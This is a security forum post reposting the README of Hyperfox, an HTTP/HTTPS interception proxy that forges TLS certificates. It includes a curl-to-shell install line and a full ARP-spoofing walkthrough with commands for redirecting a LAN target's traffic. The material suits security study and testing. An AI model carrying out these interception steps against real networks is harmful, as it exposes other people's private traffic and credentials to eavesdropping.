Citizens First Cyber Security Professionals cfcspro.com

Login

Username

Password



Not a member yet?
Click here to register.

Forgotten your password?
Request a new one here.

Connect via Facebook

Connect via Facebook

Member Poll

There are no polls defined.

Shoutbox

You must login to post a message.

16-01-2018 11:17
Yo' ... It's beginning to look like I have hired another lazy ass moderator?... That best not be the case!! Frown

12-01-2018 12:30
Yo' Citizens, I will have a couple of "new tools" and some interesting news to share with you today! I will have it all up for you shortly. Cool

01-01-2018 15:56
Yo' Citizens, Happy New Year! Grin

24-12-2017 13:40
Yo' Citizens, Merry Christmas Eve! Grin

16-12-2017 18:54
Currently creating your holiday specials! New holiday membership specials coming to you within the hour! Grin

Welcome Citizens

Welcome to, Citizens First Cyber Security Professionals.

The Individual Citizen Specific, Cyber Security Investigative Services Firm. Cyber Security Web Forum and Educational Cyber Security Dojo.

Geared strictly to helping Individual Citizens and Small Businesses! Address unwanted cyber security intrusions and hacking incidents!

View Thread

 Print Thread
Hyperfox - HTTP/HTTPs MITM proxy and traffic recorder with on-the-fly TLS cert generation - Via - KI
Brooklyn
Yo' Greetings Citizens,

Hyperfox - HTTP/HTTPs MITM proxy and traffic recorder with on-the-fly TLS cert generation - Via - KITPLOIT
cfcspro.com/images/hyperfox1.png
Hyperfox is a security tool for proxying and recording HTTP and HTTPs communications on a LAN.
cfcspro.com/images/hyperfox2.png
Hyperfox is capable of forging SSL certificates on the fly if you provide it with a root CA certificate and its corresponding key. If the target machine recognizes the root CA as trusted, then HTTPs traffic can be successfully decrypted, intercepted and recorded.


This is the development repository, check out the https://hyperfox.org site for usage information.

Get hyperfox

You can install hyperfox to /usr/local/bin with the following command (requires admin privileges):
(SHELL-KONSOLE)
curl -sL 'https://raw.githubusercontent.com/malfunkt/hyperfox/master/install.sh' | sh

You can also grab the latest release from our releases page and install it manually into another location.

Build it yourself

In order to build hyperfox you'll need Go and a C compiler:
(SHELL-KONSOLE)
go install github.com/malfunkt/hyperfox


Running hyperfox and arpfox on Linux

The following example assumes that Hyperfox is installed on a Linux box (host) on which you have root access or sudo privileges and that the target machine is connected on the same LAN as the host.

We are going to use the arpfox tool to alter the ARP table of the target machine in order to make it redirect its traffic to Hyperfox instead of to the legitimate LAN gateway. This is an ancient technique known as ARP spoofing.

First, identify both the local IP of the legitimate gateway and its matching network interface.
(SHELL-KONSOLE)
sudo route
# Kernel IP routing table
# Destination Gateway Genmask Flags Metric Ref Use Iface
# default 10.0.0.1 0.0.0.0 UG 1024 0 0 wlan0
# ...


The interface in our example is called wlan0 and the interface's gateway is 10.0.0.1.
(SHELL-KONSOLE)
export HYPERFOX_GW=10.0.0.1
export HYPERFOX_IFACE=wlan0


Then identify the IP address of the target, let's suppose it is 10.0.0.143.
(SHELL-KONSOLE)
export HYPERFOX_TARGET=10.0.0.143

Enable IP forwarding on the host for it to act (temporarily) as a common router.
(SHELL-KONSOLE)
sudo sysctl -w net.ipv4.ip_forward=1

Issue an iptables rule on the host to instruct it to redirect all traffic that goes to port 80 (commonly HTTP) to a local port where Hyperfox is listening to (1080).
(SHELL-KONSOLE)
sudo iptables -A PREROUTING -t nat -i $HYPERFOX_IFACE -p tcp --destination-port 80 -j REDIRECT --to-port 1080

We're almost ready, prepare Hyperfox to receive plain HTTP traffic:
(SHELL-KONSOLE)
hyperfox
# ...
# 2014/12/31 07:53:29 Listening for incoming HTTP client requests on 0.0.0.0:1080.


Finally, run arpfox to alter the target's ARP table so it starts sending its network traffic to the host box:
(SHELL-KONSOLE)
sudo arpfox -i $HYPERFOX_IFACE -t $HYPERFOX_TARGET $HYPERFOX_GW

and watch the live traffic coming in.

Please Download and Read The Full Tips here: https://www.kitpl...y-and.html

Thank You For Your Time, Citizens. I hope that you have a great and cyber-secure day!

Thank You Citizen,
The Administration
 
http://cfcspro.com
Jump to Forum:
top image scrolling tools
facebook_share
twitter_share
google_share
linkedin_share
blogger_share
delicious_share
scrolltop
Render time: 0.21 seconds
311,951 unique visits